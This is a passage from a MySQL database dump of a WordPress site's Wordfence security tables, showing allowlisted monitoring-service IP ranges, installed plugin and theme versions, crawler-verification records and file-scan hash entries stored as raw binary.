Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:17:{s:7:\"akismet\";s:5:\"4.1.8\";s:23:\"all-in-one-wp-migration\";s:4:\"7.37\";s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.8\";s:14:\"contact-form-7\";s:3:\"4.5\";s:23:\"contact-form-7-designer\";s:3:\"1.1\";s:22:\"contact-form-7-modules\";s:3:\"2.0\";s:11:\"dw-megamenu\";s:5:\"1.0.1\";s:15:\"dw-social-share\";s:5:\"1.0.0\";s:5:\"hello\";s:3:\"1.6\";s:14:\"login-lockdown\";s:6:\"v1.6.1\";s:12:\"spam-captcha\";s:5:\"1.4.2\";s:26:\"universal-google-analytics\";s:7:\"1.2.5.1\";s:6:\"unyson\";s:6:\"2.5.12\";s:9:\"wordfence\";s:5:\"7.5.4\";s:9:\"wp-cerber\";s:5:\"8.8.5\";s:15:\"wp-date-remover\";s:5:\"1.0.0\";s:13:\"wordpress-seo\";s:3:\"3.5\";}','yes'),('wordpressThemeVersions','a:27:{s:10:\"accelerate\";s:5:\"1.2.6\";s:11:\"alpha-store\";s:5:\"1.2.7\";s:8:\"aqueduct\";s:5:\"2.0.2\";s:8:\"barletta\";s:5:\"1.1.1\";s:14:\"clean-magazine\";s:5:\"1.5.1\";s:14:\"fabulous-fluid\";s:3:\"1.2\";s:6:\"fluida\";s:5:\"1.2.4\";s:6:\"hueman\";s:6:\"3.2.10\";s:5:\"illdy\";s:6:\"1.0.35\";s:7:\"lightly\";s:4:\"1.26\";s:16:\"mh-magazine-lite\";s:5:\"2.5.5\";s:6:\"morfeu\";s:5:\"1.1.3\";s:7:\"nirvana\";s:5:\"1.3.2\";s:9:\"panoramic\";s:6:\"1.0.19\";s:5:\"point\";s:5:\"2.0.3\";s:13:\"precious-lite\";s:5:\"1.2.6\";s:5:\"relia\";s:5:\"1.0.7\";s:9:\"sg-window\";s:5:\"1.2.1\";s:21:\"skt-construction-lite\";s:3:\"1.5\";s:6:\"square\";s:5:\"1.3.2\";s:9:\"supernews\";s:5:\"1.0.6\";s:11:\"the-minimal\";s:5:\"1.1.2\";s:7:\"tortuga\";s:5:\"1.1.4\";s:9:\"travelify\";s:5:\"3.0.4\";s:4:\"vega\";s:5:\"1.9.5\";s:7:\"verbosa\";s:5:\"0.9.6\";s:12:\"wen-business\";s:5:\"1.4.1\";}','yes'),('wordpressVersion','5.6.4','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��-��2','i��| ��OoD!���','verified',1628126088,''),('\0\0\0\0\0\0\0\0\0\0��-��2','�����>�b0�oQ1��','badPTR',1628126087,'45.133.172.50'),('\0\0\0\0\0\0\0\0\0\0��@b)','i��| ��OoD!���','verified',1630396628,''),('\0\0\0\0\0\0\0\0\0\0��@b)','�����>�b0�oQ1��','badPTR',1630396627,'64.21.98.41'),('\0\0\0\0\0\0\0\0\0\0��@b,','i��| ��OoD!���','verified',1631059593,''),('\0\0\0\0\0\0\0\0\0\0��@b,','�����>�b0�oQ1��','badPTR',1631059593,'64.21.98.44'),('\0\0\0\0\0\0\0\0\0\0��@b-','i��| ��OoD!���','verified',1629893263,''),('\0\0\0\0\0\0\0\0\0\0��@b-','�����>�b0�oQ1��','badPTR',1629893262,'64.21.98.45'),('\0\0\0\0\0\0\0\0\0\0��@b/','i��| ��OoD!���','verified',1629044116,''),('\0\0\0\0\0\0\0\0\0\0��@b/','�����>�b0�oQ1��','badPTR',1629044115,'64.21.98.47'),('\0\0\0\0\0\0\0\0\0\0��B��','i��| ��OoD!���','verified',1631118544,''),('\0\0\0\0\0\0\0\0\0\0��B��','�����>�b0�oQ1��','badPTR',1631118544,'66.246.224.11'),('\0\0\0\0\0\0\0\0\0\0��B��','i��| ��OoD!���','verified',1630354514,''),('\0\0\0\0\0\0\0\0\0\0��B��','�����>�b0�oQ1��','badPTR',1630354513,'66.246.224.12'),('\0\0\0\0\0\0\0\0\0\0��B��\r','i��| ��OoD!���','verified',1630857370,''),('\0\0\0\0\0\0\0\0\0\0��B��\r','�����>�b0�oQ1��','badPTR',1630857369,'66.246.224.13'),('\0\0\0\0\0\0\0\0\0\0��B��','i��| ��OoD!���','verified',1630521285,''),('\0\0\0\0\0\0\0\0\0\0��B��','�����>�b0�oQ1��','badPTR',1630521284,'send.fcpi.net'),('\0\0\0\0\0\0\0\0\0\0��x�u','i��| ��OoD!���','verified',1629407007,''),('\0\0\0\0\0\0\0\0\0\0��x�u','�����>�b0�oQ1��','badPTR',1629407007,'120.229.153.117'),('\0\0\0\0\0\0\0\0\0\0��x�|\'','i��| ��OoD!���','verified',1628318670,''),('\0\0\0\0\0\0\0\0\0\0��x�|\'','�����>�b0�oQ1��','badPTR',1628318676,'120.235.124.39'),('\0\0\0\0\0\0\0\0\0\0��x��','i��| ��OoD!���','verified',1631008671,''),('\0\0\0\0\0\0\0\0\0\0��x��','�����>�b0�oQ1��','badPTR',1631008670,'120.235.138.198'),('\0\0\0\0\0\0\0\0\0\0����1','i��| ��OoD!���','verified',1629343123,''),('\0\0\0\0\0\0\0\0\0\0����1','�����>�b0�oQ1��','badPTR',1629343121,'129.226.49.27'),('\0\0\0\0\0\0\0\0\0\0���c.�','i��| ��OoD!���','verified',1630575611,''),('\0\0\0\0\0\0\0\0\0\0���c.�','�����>�b0�oQ1��','badPTR',1630575610,'207.99.46.204'),('\0\0\0\0\0\0\0\0\0\0���c.�','i��| ��OoD!���','verified',1626454172,''),('\0\0\0\0\0\0\0\0\0\0���c.�','�����>�b0�oQ1��','badPTR',1626454171,'207.99.46.205'),('\0\0\0\0\0\0\0\0\0\0���c.�','i��| ��OoD!���','verified',1630139991,''),('\0\0\0\0\0\0\0\0\0\0���c.�','�����>�b0�oQ1��','badPTR',1630139990,'207.99.46.206');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0�K��Z���]���/','wp-content/plugins/unyson/framework/static/libs/unycon/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']F�Gg\0�@���^�','���E�b���Ӛ\r�殬� ��i�7�\"N��\n','',0,'?'),('\0�@u���2��X�','wp-content/plugins/contact-form-7/modules/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I���~�3/9&','{r\'j3��Up�h���\n�w5�/�����	�','',0,'?'),('\0gR/$e�l�uX�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tr.js',0,'�����Ŀ\n��#)�4','�����Ŀ\n��#)�4','���/k��Q�5Rˣׯl�F����Ot�d�B�','',0,'?'),('\0G-S7���=!M���','wp-content/themes/nirvana/admin/images/coffee.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�)U6��','vq�u�eR�G?xd�d<�;\"��i�w�Qp�','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\0.5j\"P�1�j�]�E8','wp-content/themes/accelerate/fontawesome/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|]�@���R�4z','/���\"�D~��oԽ��5�~D[s_Qy.!z','',0,'?'),('\0/�\'��5vw��ƺ��','wp-content/themes/fabulous-fluid/css/metabox-tabs.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3#-��h[�O�\0��7','�{�<\nиԸ>���Dޤ-��������5{d','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8S��Ɣ-\"���W��','�>�9�=9�}�P���O��8+�C�Mҙ�r�{','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\09ʔ#2���u�␯�','wp-content/themes/square/inc/css/customizer-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2z�@���:�6q��',':$7��e��+�y��+��OI:g�<4nW.�','',0,'?'),('\0@8�(���܆�tȕ}','wp-content/themes/aqueduct/img/simplethumbnail.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޝ4g��ژ�)W�g','#դT�A�Y��3�Z�d>K�0\n�3�\nu8kӞ','',0,'?'),('\0@��5�������','wp-content/themes/hueman/assets/front/img/demo/10-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�W	ۙ֟�fy\'��','�2u���b퍴I��J�q�qm��g�r�XZ�%��','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0VI�����R�s\'<g','wp-content/themes/morfeu/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' /o��ʥc`�G���o','��y��\nwwߌtb��qe�����Z���T�3','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0a\0=꼏뺏��{�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/el.js',0,'��B�����n:�`��','��B�����n:�`��','J�a�ؚ��eDo�|£�VU��Z��H�','',0,'?'),('\0c$럆\"y`\0F�6�	�','wp-content/plugins/unyson/framework/includes/option-types/range-slider/class-fw-option-type-range-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�,�V�Y�n�9<��','r�u<�-*���Q��e�!&ށy��n~��oʀ9','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0m|h0;�X��np','wp-content/themes/hueman/option-tree/assets/css/ot-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���I�7���L�','}ެ߲�)��2��\Z>V�����/���7','',0,'?'),('\0o��y���z_��p�D�','wp-content/themes/vega/sample/images/recent-news-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mw�IE$B�L��','X�G�L��Y9�h2�J�myL��TVt[Z�5Q','',0,'?'),('\0u�}-��uj�A�CP�','wp-content/themes/nirvana/templates/template-threecolumns-center.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�X��Zxe�mS','ˁ��G:�Ѳ��<F��\rNI��%3r�N^V��','',0,'?'),('\0Ơ�2!��n[�g','wp-content/themes/sg-window/inc/customize-mobile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Z�^���gQ��t','!�l��\\TF\n�p%�s���zG���okb��','',0,'?'),('\0�2]������l','wp-content/themes/morfeu/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��%��\n4��.I��','k!N�qi}�gG�8\\IQ2�vb��I?�=�`��','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0���1UzevEH��BJl','wp-content/themes/morfeu/assets/sass/wordpress/_wordpress.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�}��&i�k�H�J�','q�����\"t�y�8�Z�����P��ފȩ�','',0,'?'),('\0�(]F�&Γ��{|m0�','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[L���<��KŐC��','�Abd�_K�}�4z�M�B߈G�(��R�5c','',0,'?'),('\0��%ΥJ-�p��','wp-content/plugins/wordpress-seo/inc/class-rewrite.php',0,'�B�_�y���k)���','�B�_�y���k)���','g��L�\'����@�)\n�`�|(a��=I��z�s','',0,'?'),('\0�s.#��e{�!L՘','wp-content/plugins/unyson/framework/extensions/social/extensions/social-facebook/helpers.php',0,'u�x$�-�O��\0Em','u�x$�-�O��\0Em','o�.����W�Xu��u��G�<L��|�\'���','',0,'?'),('\0�T&E�5��c����','wp-content/themes/hueman/assets/front/fonts/titillium-regularitalic-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x%WN��g\'���KG','S�Տ\0Z�w�#s�B�\n�����	��*n��','',0,'?'),('\0���p�,���&�-','wp-content/plugins/unyson/framework/extensions/backups/extensions/backups-demo/static/page.js',0,'�*�꼒�~�ϸQ�','�*�꼒�~�ϸQ�','\"��y����FQy8��7!��KF~-�H��A@','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',0,'�i��X�\n�қl��','�i��X�\n�қl��','�3��\n�b�Q8�I4�v\0��$1rf�y�','',0,'?'),('\0�����*�Oݷ��','wp-content/plugins/spam-captcha/core/img/file.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�����\0d�','v�.��nz�{��m�8�%�����+�xF)','',0,'?'),('\0��YO�<,�\Zr\\,�','wp-content/themes/square/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z\'�2��w:&j\0LJb','F`n\"l��s�E�=8�+P�@o	�JK\n�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VGѢt�G�g��#','�a숟?h-d��o�n8�^��![��bP\r�/�','',0,'?'),('\0��\ZIG�4���U��','wp-content/themes/hueman/functions/init-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' y�����no��Z�','fm΅fB��dɡ�Ȗ)y~=���V�n�a','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�ڜ��=�&\0�9�G','�\Zl�,�cq|����Td�ٹ��|-�WT!ۧ','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'׊�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.#q�.�8L�E��nd�','\"�Lƺ���E\\��d��:E4\"[H��u�1M�','',0,'?'),('#b�\'�3�\nww}�X�','wp-content/themes/lightly/js/vendor/selectivizr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2j��J0��b�','(�ӊ=W��Y\\���He��\Z�=�Ub�E�','',0,'?'),('��\r.<�؆o%M�m�','wp-content/themes/nirvana/images/socials/Twitch.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�����,J��lVA��','�X���r�,��<����R/jp�.x�]Fm�','',0,'?'),('<�G�+��\rO4۾[','wp-content/themes/hueman/option-tree/assets/images/layout/left-dual-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4+g��\nN�C�S�[','p\0�@(E|�H�Ӂ#dT_WԾ� �M|�qm@','',0,'?'),('A�wF�K�s�|�B5�','wp-content/themes/vega/parts/banner-custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���	9����K�#�','4��U��n�R�Ǜg��:h?��I�n��k���','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('T�\r�4�}�^a@|O','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php',0,'��uQYCSD|���z','��uQYCSD|���z','����ض9��7���d�)�	��b�@','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),('[ce0 fD�J\0��','wp-content/themes/relia/layouts/content-sidebar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�q� �:iY�Q,6.*','7-��P1�Ng�-=!�b\'��s9h\"<�vL�','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k”���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��\0i�09׽','\r�.\Z�<�T�·\nl!�(�Z�5,Ia �?','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��_h[j��74�*�','�����K��黢~}�:R��1Ó�\\D�','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�p�@�����*�Y','wp-content/themes/wen-business/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�1T���؆u�^�','Y����e8��ef����qIJpĕC��\Z43�?','',0,'?'),('���,n�K̥�>?6','wp-content/themes/point/images/footerthumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߜ�+&�sD����iO�','ˍ��b��J�O��tPv?P�����(D�,b�','',0,'?'),('>A�X��a�s�(~','wp-content/plugins/contact-form-7/admin/js/scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',F���#C�\Z�|(�@',')�L��dM�l�Tf����E#�����P�1�','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	